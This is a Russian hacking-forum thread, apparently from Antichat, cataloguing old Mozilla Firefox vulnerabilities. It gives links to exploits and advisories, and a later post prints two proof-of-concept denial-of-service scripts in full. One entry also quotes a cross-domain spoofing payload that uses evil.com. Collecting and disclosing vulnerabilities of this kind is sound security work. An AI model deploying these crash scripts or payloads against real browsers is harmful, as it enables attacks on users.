PDA

Просмотр полной версии : [Обзор уязвимостей] Mozilla Firefox


Solide Snake
27.11.2007, 18:36
http://img137.imageshack.us/img137/5937/11645242801161678484106rt7.jpg

[Обзор уязвимостей] Mozilla Firefox

Доброго времени суток:) Мой сегодняшний обзор посвящён такому популярному браузеру как Mozilla Firefox. В обзоре содержатся ссылки на эксплоиты, заплатки иобновления, описание некоторых уязвимостей и способы их устранения. Поехали:)

Программа: Mozilla Firefox
Сайт производителя: www.mozilla.com
Актуальная версия: 2.0.0.10

Exploits/Shellcode

Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit (http://www.milw0rm.com/exploits/986)
Mozilla Firefox view-source:javascript url Code Execution Exploit (http://www.milw0rm.com/exploits/1007)
Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit (http://www.milw0rm.com/exploits/1089)
Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit (http://www.milw0rm.com/exploits/1102)
Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit (http://www.milw0rm.com/exploits/1233)
Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit (http://www.milw0rm.com/exploits/1253)
Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit (http://www.milw0rm.com/exploits/1257)
Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC (http://www.milw0rm.com/exploits/1362)
Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit (http://www.milw0rm.com/exploits/1369)
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux) (http://www.milw0rm.com/exploits/1474)
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx) (http://www.milw0rm.com/exploits/1480)
Mozilla Firefox <= 1.5.0.1, Camino <= 1.0 Null Pointer Dereference Crash (http://www.milw0rm.com/exploits/1667)
Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC (http://www.milw0rm.com/exploits/1716)
Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit (http://www.milw0rm.com/exploits/1802)
Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit (http://www.milw0rm.com/exploits/1867)
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC (http://www.milw0rm.com/exploits/2082)
Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit (http://www.milw0rm.com/exploits/2244)
Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit (http://www.milw0rm.com/exploits/2695)
Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability (http://www.milw0rm.com/exploits/3340)
Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit (http://www.milw0rm.com/exploits/3606)
Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit (http://www.milw0rm.com/exploits/4559)


Mozilla Vulnerability



Многочисленные ошибки в браузерах Mozilla / Firefox (multiple bugs)
Перехват содержимого поискового запроса через поисковые расширения, межсайтовый скриптинг через link.

Mozilla Suite and Firefox "favicons" LINK Code Execution (http://securityvulns.ru/files/firelinking.html)



Многочисленные уязвимости в Mozilla / Firefox / Thunderbird (multiple bugs)
Выполнение кода через javascript, повреждение динамической памяти через стили, повреждение памяти через QueryInterface, выполнение кода через XULDocument.persist(), целочисленные переполнения, утечка информации через nsExpatDriver::ParseBuffer(). Потенциально возможна установка вредоносного кода.

Mozilla Firefox "location.QueryInterface()" Remote Command Execution Exploit (http://securityvulns.ru/files/firefox_queryinterface.pm)


Многочисленные ошибки в Mozilla / Firefox / Thunderbird (multiple bugs)
Многочисленные ошибки межсайтового скриптинга, обход защиты от исполнения javascript, выполнение кода.

Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution exploit(metasploit) (http://securityvulns.ru/files/mozilla_compareto.pm)
Mozilla Firefox URLs Script Injection Exploit (http://securityvulns.ru/files/mozillascript.html)
Mozilla XBL Implementation Script Execution exploit (http://securityvulns.ru/files/mozxbl.html)
Mozilla Firefox "Set As Wallpaper" Code Execution Exploit (http://securityvulns.ru/files/mozillawallex.html)


Переполнение буфера при разборе GIF-файлов в Mozilla/Firefox/Thunderbird (buffer overflow)
Переполнение буфера при разборе GIF-файла.

Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit (http://securityvulns.ru/files/55k7-snake.c)



Переполнение буфера в Mozilla (buffer overflow)
Переполнение динамической памяти при передаче URL типа news:// в агент новостей.

Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. (http://securityvulns.ru/docs7469.html)


Утечка информации в Mozilla (information leak)
Используя объект local_files можно получить список локальных файлов. В отдельных случаях можно получить содержимое файла.

Disclosure of file system information in Mozilla Firefox and Opera Browser (http://securityvulns.ru/docs7266.html)
[Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera (http://securityvulns.ru/docs7293.html)


Выполнение кода через сетевое окружение в Mozilla (code execution)
Используя URL типа shell:NETHOOD\ можно выполнить исполняемый файл с любого хоста в сетевом окружении в Windows.

[Full-Disclosure] MOZILLA: SHELL can execute remote EXE program (http://securityvulns.ru/docs6463.html)


Выполнение кода через обработчики URL в Mozilla Firefox / Thunderbird (code execution)
В случае, если для обработки URL типа mailto:, news:, nntp: и т.д. используется Thunderbird, возможно внедрение шел-символов.

Mozilla protocol abuse report and the XPI exploits (http://securityvulns.ru/files/mozillaprotocolabuse.zip)


Подмена фокуса в Mozilla Firefox (focus spoofing)
Возможно подменить фокус ввода текста

[Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities (http://securityvulns.ru/Rdocument386.html)


Целочисленное переполнение при работе с SOAP в Mozilla (integer overflow)
Целочисленное переполнение в конструкторе объекта SOAPParameter.

[Full-Disclosure] iDEFENSE Security Advisory 08.02.04: Netscape/Mozilla SOAPParameter Constructor Integer Overflow Vulnerability (http://securityvulns.ru/docs6569.html)


Целочисленное переполнение в Mozilla Firefox (integer overflow)
Целочисленное переполнение при больших размерах изображения GIF.

[Full-disclosure] firefox 2.0.0.2 crash (http://securityvulns.ru/Qdocument301.html)


DoS против Mozilla Firefox
Возможно создать большое количество незакрываемых всплывающих сообщений.

[Full-disclosure] Firefox 2.0.0.6 Java Pop-Up DoS flaw (http://securityvulns.ru/Rdocument665.html)


Доступ между доменами в Mozilla Firefox
Используя location.hostname='evil.com\x00foo.example.com' атакующий может добиться, чтобы запрос для foo.example.com ушел на evil.com, что позволяет доступ между доменами. Уязвимость может быть использована для скрытой установки вредоносного кода.

Firefox: serious cookie stealing / same-domain bypass vulnerability (http://securityvulns.ru/Qdocument74.html)
[Full-disclosure] Firefox bookmark cross-domain surfing vulnerability (http://securityvulns.ru/Qdocument140.html)


Перехват учетных данных в менеджере паролей Firefox (information leak)
При автоматическом заполнении формы не учитывается ее назначение, поэтому, если атакующий может вставить форму в содержимое сайта, то он сможет получить результаты сохраненных полей (логин/пароль).

Cross-Site Forms + Password Manager = Security Failure (https://bugzilla.mozilla.org/show_bug.cgi?query_format=specific&order=relevance+desc&bug_status=__open__&id=360493)


Межсайтовый скриптинг через jar: в Mozilla Firefox
Используя URL jar: возможно выполнть код в контексте сайта, позволяющего аплоайд файлов JAR, ZIP, DOC и т.д.

Web Mayhem: Firefox’s JAR: Protocol issues (http://securityvulns.ru/Sdocument385.html)


Переполнение буфера в Mozilla (buffer overflow)
Переполнение буфера при обработке URL jar

Mozilla: Exploitable heap corruption via jar: URI handler. (http://securityvulns.ru/docs3759.html)


Foundation Security Advisory

Mozilla Foundation Security Advisory 2007-29 (http://securityvulns.ru/Sdocument256.html)
Mozilla Foundation Security Advisory 2007-31 (http://securityvulns.ru/Sdocument258.html)
Mozilla Foundation Security Advisory 2007-33 (http://securityvulns.ru/Sdocument260.html)
Mozilla Foundation Security Advisory 2007-35 (http://securityvulns.ru/Sdocument262.html)
Mozilla Foundation Security Advisory 2007-30 (http://securityvulns.ru/Sdocument257.html)
Mozilla Foundation Security Advisory 2007-32 (http://securityvulns.ru/Sdocument259.html)
Mozilla Foundation Security Advisory 2007-34 (http://securityvulns.ru/Sdocument261.html)
Mozilla Foundation Security Advisory 2007-36 (http://securityvulns.ru/Sdocument263.html)
Mozilla Foundation Security Advisory 2007-26 (http://securityvulns.ru/Rdocument662.html)
Mozilla Foundation Security Advisory 2007-27 (http://securityvulns.ru/Rdocument663.html)
Mozilla Foundation Security Advisory 2007-19 (http://securityvulns.ru/Rdocument521.html)
Mozilla Foundation Security Advisory 2007-21 (http://securityvulns.ru/Rdocument523.html)
Mozilla Foundation Security Advisory 2007-25 (http://securityvulns.ru/Rdocument525.html)
Mozilla Foundation Security Advisory 2007-23 (http://securityvulns.ru/Rdocument519.html)
Mozilla Foundation Security Advisory 2007-20 (http://securityvulns.ru/Rdocument522.html)
Mozilla Foundation Security Advisory 2007-22 (http://securityvulns.ru/Rdocument524.html)
Mozilla Foundation Security Advisory 2007-24 (http://securityvulns.ru/Rdocument518.html)
Mozilla Foundation Security Advisory 2007-18 (http://securityvulns.ru/Rdocument520.html)
Mozilla Foundation Security Advisory 2007-17 (http://securityvulns.ru/Rdocument144.html)
Mozilla Foundation Security Advisory 2007-12 (http://securityvulns.ru/Rdocument139.html)
Mozilla Foundation Security Advisory 2007-14 (http://securityvulns.ru/Rdocument141.html)
Mozilla Foundation Security Advisory 2007-16 (http://securityvulns.ru/Rdocument143.html)
Mozilla Foundation Security Advisory 2007-11 (http://securityvulns.ru/Rdocument138.html)
Mozilla Foundation Security Advisory 2007-13 (http://securityvulns.ru/Rdocument140.html)
Mozilla Foundation Security Advisory 2007-15 (http://securityvulns.ru/Rdocument142.html)
Mozilla Foundation Security Advisory 2007-10 (http://securityvulns.ru/Qdocument269.html)
Mozilla Foundation Security Advisory 2007-09 (http://securityvulns.ru/Qdocument270.html)
Mozilla Foundation Security Advisory 2007-07 (http://securityvulns.ru/Qdocument205.html)
Mozilla Foundation Security Advisory 2007-01 (http://securityvulns.ru/Qdocument199.html)
Mozilla Foundation Security Advisory 2007-02 (http://securityvulns.ru/Qdocument200.html)
Mozilla Foundation Security Advisory 2007-03 (http://securityvulns.ru/Qdocument201.html)
Mozilla Foundation Security Advisory 2007-04 (http://securityvulns.ru/Qdocument202.html)
Mozilla Foundation Security Advisory 2007-05 (http://securityvulns.ru/Qdocument203.html)
Mozilla Foundation Security Advisory 2007-06 (http://securityvulns.ru/Qdocument204.html)
Mozilla Foundation Security Advisory 2007-08 (http://securityvulns.ru/Qdocument206.html)
Mozilla Foundation Security Advisory 2006-75 (http://securityvulns.ru/Pdocument432.html)
Mozilla Foundation Security Advisory 2006-68 (http://securityvulns.ru/Pdocument440.html)
Mozilla Foundation Security Advisory 2006-74 (http://securityvulns.ru/Pdocument433.html)
Mozilla Foundation Security Advisory 2006-72 (http://securityvulns.ru/Pdocument436.html)
Mozilla Foundation Security Advisory 2006-69 (http://securityvulns.ru/Pdocument439.html)
Mozilla Foundation Security Advisory 2006-76 (http://securityvulns.ru/Pdocument431.html)
Mozilla Foundation Security Advisory 2006-73 (http://securityvulns.ru/Pdocument434.html)
Mozilla Foundation Security Advisory 2006-71 (http://securityvulns.ru/Pdocument437.html)
Mozilla Foundation Security Advisory 2006-70 (http://securityvulns.ru/Pdocument438.html)
Fixed in Firefox 1.5.0.7 (http://securityvulns.ru/Odocument287.html)
[Full-Disclosure] Mozilla Security Advisory 2004-07-08 (http://securityvulns.ru/docs6464.html)
Security Advisory for Bugzilla v2.13 and older (http://securityvulns.ru/docs1986.html)

BlackCats
27.11.2007, 18:42
уже второй обзор от тебя,
как сказать... я конечно за развитие + наполнение античата, но вот например когда я писал обзор уязвимостей в 1 из форумов - ко мне придрались, т.к. у меня там было тоого, что нашёл сам - только 40%, а остальное с багтраков... а у тебя - как я понимаю 0 своего материала.. остаётся только удивляться.

Ну, во первых это мой не второй а третий обзор)))Ну а потом, обзор уязвимостей не обязательно делать только для того чтобы выкладывать в нём ошибки которые сам нашёл. Т.к. тогда в нём не будет смысла. Там будет 3-4 баги и всё. А тут, подбор эксплоитов, ошибок и т.д.

я не говорю выкладывать только то что сам нашёл.. я делал - выложил 40% своего, и всё остальное - что нашёл по багтракам, и меня всёравно осудили.

Solide Snake
27.11.2007, 18:52
Ну, во первых это мой не второй а третий обзор)))Ну а потом, обзор уязвимостей не обязательно делать только для того чтобы выкладывать в нём ошибки которые сам нашёл. Т.к. тогда в нём не будет смысла. Там будет 3-4 баги и всё. А тут, подбор эксплоитов, ошибок и т.д.

[aywo]
27.11.2007, 18:59
за обзор +, но я не увидел в нем уязвимость при обработке данных по протоколу jar (Java Archive) :
Firefox не проверяет на MIME тип данных, из-за этого браузеру можно передать ZIP-архив с любыми исполняемыми файлами и примет его как надежный файл...

Solide Snake
27.11.2007, 19:05
Насчёт ошибки при обработке по протоколу jar, спасибо. Добавлено в первый пост. Переполнение буфера и Межсайтовый скриптинг.

Solide Snake
14.11.2008, 20:26
Mozilla Firefox 2.0.0.1 DoS exploit

<script>
function owned(){

setTimeout("owned()",1000);
owned();
}
</script>
<input type="foo" size="30" id="bar" onchange="owned()">

(c) Michal Bucko.


Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash

================================================== ========================

Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash
and Remote Denial of Service.

*Version Tested:*
Mozilla 3.0.3 - 1.9.0 Branch /(Specifically for Latest Version)/

*Severity:*
High

*Description:*
The mozilla firefox is vulnerable to user interface event dispatcher null
pointer dereference denial of service attacks. The dispatched event created
dynamically leads to firefox crash when it is called directly or in a
defined l
oop with number of generated user interface events.The resultant crash
results in:

Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread: 0
Thread 0 Crashed: 0 libxpcom_core.dylib nsTArray_base::Length() const + 11
(nsTArray.h:66)
1 libgklayout.dylib
nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent* ,
nsTArray&) + 261 (nsContentUtils.cpp:4083)

This security issue is a result of unhandled exception which is a result
of null
pointer dereference.

*Links:*
http://www.secniche.org/advisory.html
http://evilfingers.com/advisory/index.php

*Proof of Concept
http://www.secniche.org/moz303/index.html
*
*Detection:*
SecNiche confirmed this vulnerability affects Mozilla Firefox
on Microsoft Windows XP SP2 platform.The versions tested are:

Mozilla 3.0.3 - 1.9.0 Branch

*Disclosure Timeline:*
Disclosed: 28 September 2008
Release Date. 28 September ,2008

*Vendor Response:*
Mozilla confirm this vulnerability.
*
Credit:*
Aditya K Sood

*Disclaimer*
The information in the advisory is believed to be accurate at the time
of publishing based
on currently available information. Use of the information constitutes
acceptance for use
in an AS IS condition. There is no representation or warranties, either
express or implied
by or with respect to anything in this document, and shall not be liable
for a ny implied
warranties of merchantability or fitness for a particular purpose or for
any indirect special
or consequential damages.

================================================== ========================

<html>
<title>Mozilla Firefox User Interface Dispatcher Crash and Remote Denial of Service</title>
<head>


<script language = "JavaScript">
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}


moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onkeydown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onkeyup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onmousedown", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

moz303.initUIEvent("onmouseup", true, true, this, 1);
for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++)
{
document.documentElement.dispatchEvent(moz303);
}

</script>

# milw0rm.com [2008-09-28]